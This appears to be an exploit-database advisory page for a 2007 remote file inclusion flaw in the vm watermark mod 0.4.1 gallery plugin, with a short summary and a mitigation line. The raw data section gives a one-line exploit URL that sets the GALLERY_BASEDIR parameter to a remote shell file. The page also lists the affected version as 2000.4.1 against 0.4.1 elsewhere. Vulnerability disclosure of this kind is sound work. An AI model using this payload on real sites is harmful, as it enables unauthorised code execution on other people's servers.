header-logo
Suggest Exploit
vendor:
vm watermark mod
by:
ThE TiGeR
7.5
CVSS
HIGH
Remote file inclusion
CWE
Product Name: vm watermark mod
Affected Version From: 2000.4.1
Affected Version To: 2000.4.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

vm watermark mod 0.4.1 Remote file include

This vulnerability allows an attacker to include remote files in the 'watermark.php' script of vm watermark mod 0.4.1. By manipulating the 'GALLERY_BASEDIR' parameter, an attacker can include a malicious file ('shell.txt' in this case) from a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of vm watermark mod or to apply necessary security measures to prevent remote file inclusion.
Source

Exploit-DB raw data:

#vm watermark mod 0.4.1 Remote file include

#Download script : http://gallery.menalto.com/files/vm-watermark_mod-0.4.1.zip

#Thanks to str0ke

#Exploit :

#http://www.site.com/[path]/watermark.php?GALLERY_BASEDIR=shell.txt?

#Discovered by : ThE TiGeR

# Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-05]

Navigation

Suggest Exploit

Services By CQR